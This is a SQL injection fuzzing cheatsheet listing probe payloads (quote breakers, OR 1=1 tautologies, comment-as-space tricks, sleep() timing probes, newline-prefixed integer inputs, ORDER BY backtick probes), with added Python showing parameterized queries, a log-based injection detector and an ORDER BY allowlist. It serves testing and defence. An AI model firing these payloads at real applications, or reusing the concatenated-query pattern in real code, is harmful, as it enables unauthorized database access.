SQLi Fuzzing Cheatsheet
Check whether a single quote or a double quote breaks the query
name" and "1"="1
name' and '1'='1
name%27
name%2527
name)
name))
Try inserting one quote versus two quotes to see whether the second quote makes the error message disappear
'
''
"
""
Once you've identified whether a single or double quote breaks the SQL query, try both true and false statements and compare the responses
name' OR 1='1
name' OR 1='2
name' OR 1='1 #
name' OR 1='2 #
name' OR 1=1 #
name' OR 1=1 %23
You can also try to comment out the trailing quote. Identify which special characters start a comment in the target database, and use those to craft your query.
\'
--'
#'
%23'
Try multi-line comments in place of spaces
'/*abc*/OR/*swag*/1='1
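The quote, true/false and comment-as-whitespace probes above all test the same underlying defect: user input concatenated into the query string. The following is an added example, not code from the cheatsheet, showing a vulnerable lookup beside its parameterized fix and how each probe behaves against both. The table and payload strings are constructed; SQLite is used so it runs offline, and because SQLite compares the literal `1='1'` as false, the probes use the string form `'1'='1'` that also appears on the page.

```python
import sqlite3

# Constructed sample data (not from the original page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users (username) VALUES (?)",
                     [("alice",), ("bob",), ("carol",)])
    return conn

def lookup_vulnerable(conn, name):
    """String concatenation: a quote in the input becomes SQL syntax."""
    sql = f"SELECT username FROM users WHERE username = '{name}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, name):
    """Bound parameter: the quote stays inside the value and never reaches the parser."""
    rows = conn.execute("SELECT username FROM users WHERE username = ?", (name,))
    return [row[0] for row in rows]

def probe(conn, lookup, payload):
    """Row count the probe produces, or 'error' when it breaks the statement.
    An error on a single quote that vanishes with two quotes is the
    first signal the cheatsheet tells you to look for."""
    try:
        return len(lookup(conn, payload))
    except sqlite3.Error:
        return "error"

if __name__ == "__main__":
    db = make_db()
    probes = ["'", "''", "nobody' OR '1'='1", "nobody' OR '1'='2",
              "nobody'/*abc*/OR/*swag*/'1'='1"]
    for payload in probes:
        print(f"{payload!r:40} vulnerable={probe(db, lookup_vulnerable, payload)!s:6}"
              f" safe={probe(db, lookup_safe, payload)}")
```

Against the concatenated query a lone quote errors, two quotes return cleanly, the true condition returns every row and the false one returns none, with the comment-spaced variant behaving exactly like the plain one; against the bound query every payload is just a username nobody has.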
Check what the integer is encapsulated in
1)
1))
1'
1''
1"
1""
1%27
1%2527
Perform mathematical operations
3-1
3%2b1
3/3
3/sleep(10)
3-sleep(10)
3-sleep/*f*/(10)
3%2bsleep(1)
%0a%0d/sleep(3)
If the application states that only integers are allowed, try injecting a newline before the payload
id=2%0A%0DOR/**/1=1
2%0a%0d/sleep(3)
2%0A%0D-1
2%0A%0D/2
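From the defender's side, the arithmetic, sleep and newline probes above share a set of shapes that survive into access logs: percent-encoded (sometimes double-encoded) quotes and `#`, CR/LF inside a numeric parameter, `/**/` in place of spaces, `sleep(` and `OR 1=1`. The following added detection routine (not part of the cheatsheet) decodes each query parameter layer by layer, normalizes comments and line breaks the way the database engine would, and flags the indicators. The log lines are constructed; a lone apostrophe such as in `O'Brien` is recorded but not treated as sufficient on its own.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the original page): two benign requests,
# then requests carrying the probe shapes listed on the cheatsheet.
SAMPLE_LOG = """\
GET /item?id=2 HTTP/1.1
GET /search?name=O%27Brien HTTP/1.1
GET /item?id=2%0A%0DOR/**/1=1 HTTP/1.1
GET /item?id=3%2bsleep(1) HTTP/1.1
GET /search?name=name%2527 HTTP/1.1
GET /list?order=name%60%20DESC%20%2523 HTTP/1.1
"""

INDICATORS = {
    "tautology": re.compile(r"\b(or|and)\b\s*'?\d+'?\s*=\s*'?\d+'?"),
    "sleep_call": re.compile(r"\bsleep\s*\("),
    "comment_terminator": re.compile(r"#|--"),
    "backtick": re.compile(r"`"),
}
# Indicators strong enough on their own; an unbalanced quote alone is not.
STRONG = {"tautology", "sleep_call", "comment_terminator", "backtick",
          "newline_in_param", "double_encoding"}

def decode_layers(raw, limit=5):
    """Percent-decode until the value stops changing; the layer count exposes
    %2527-style double encoding (%2527 -> %27 -> ')."""
    value, layers = raw, 0
    while layers < limit:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers

def normalize(value):
    """See the value the way the SQL parser does: /* */ comments and CR/LF are whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).lower()

def indicators_for(raw):
    """Sorted list of indicator names found in one raw (still encoded) parameter value."""
    decoded, layers = decode_layers(raw)
    found = set()
    if layers >= 2:
        found.add("double_encoding")
    if "\n" in decoded or "\r" in decoded:
        found.add("newline_in_param")
    if "/*" in decoded:
        found.add("comment_as_space")
    if decoded.count("'") % 2 or decoded.count('"') % 2:
        found.add("unbalanced_quote")
    text = normalize(decoded)
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            found.add(name)
    return sorted(found)

def analyze_line(line):
    """Map each query parameter of a 'METHOD path HTTP/x' log line to its indicators."""
    path = line.split()[1]
    result = {}
    for pair in urlsplit(path).query.split("&"):
        if pair:
            key, _, raw = pair.partition("=")
            result[key] = indicators_for(raw)
    return result

def suspicious(line):
    return any(set(inds) & STRONG for inds in analyze_line(line).values())

def scan(log):
    """Return the log lines that carry at least one strong indicator."""
    return [line for line in log.splitlines() if suspicious(line)]

if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        print(f"{'ALERT' if suspicious(line) else 'ok   '} {line}  {analyze_line(line)}")
```

Decoding with `unquote` rather than `unquote_plus` is deliberate: the `%2b` in `3%2bsleep(1)` must come back as a literal `+`, and a second pass that rewrote `+` into a space would both miscount the layers and alter the value being matched.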
The MySQL documentation states that an "order by" clause can reference a column in one of the following two ways:
Order By name;
Order By `name`;
An Order By column name cannot be wrapped in single (') or double (") quotes
Detecting "Order By" SQLi:
order=name` #
order=name`, `name
order=name` DESC %23
order=name` ASC %23
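Because an ORDER BY column is an identifier rather than a value, it cannot be passed as a bound parameter, which is why `order=` parameters are so often concatenated and why the backtick probes above work: in MySQL the `#` opens a comment that swallows the closing backtick the application appends. The following is an added example, not code from the cheatsheet, contrasting that concatenation with the standard fix, an exact-match allowlist of sortable columns and directions checked before the identifier is quoted. The column set, table and rows are constructed, and SQLite (which accepts backtick-quoted identifiers) is used so it runs offline.

```python
import sqlite3

# Constructed allowlist for a hypothetical listing endpoint (not from the page).
SORTABLE_COLUMNS = {"name", "created_at", "price"}
DIRECTIONS = {"ASC", "DESC"}

def vulnerable_order_by(column, direction="ASC"):
    """Concatenation: order=name` #  leaves a stray backtick that the # comments out."""
    return f"ORDER BY `{column}` {direction}"

def is_allowed(column, direction="ASC"):
    """Exact-match allowlist: no quote, backtick, comma or comment character can pass,
    because the parameter is compared against known names, never inspected for bad bytes."""
    return column in SORTABLE_COLUMNS and direction.upper() in DIRECTIONS

def build_order_by(column, direction="ASC"):
    """Quote the identifier only after it has matched the allowlist."""
    if not is_allowed(column, direction):
        raise ValueError(f"unsupported sort: column={column!r} direction={direction!r}")
    return f"ORDER BY `{column}` {direction.upper()}"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (name TEXT, price REAL)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("alice", 3.0), ("bob", 1.0), ("carol", 2.0)])
    return conn

def sorted_names(conn, column, direction):
    """The only place the clause is spliced into SQL, and only via build_order_by."""
    sql = f"SELECT name FROM items {build_order_by(column, direction)}"
    return [row[0] for row in conn.execute(sql)]

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_order_by("name` #", "DESC"))   # the probe's effect on concatenation
    print(sorted_names(db, "name", "desc"))
    for column in ["name` #", "name`, `name"]:
        print(column, "allowed:", is_allowed(column, "DESC"))
```

Rejecting anything outside the allowlist is preferable to escaping backticks: the set of sortable columns is small and known at build time, and a rejected request is also a clean signal to log.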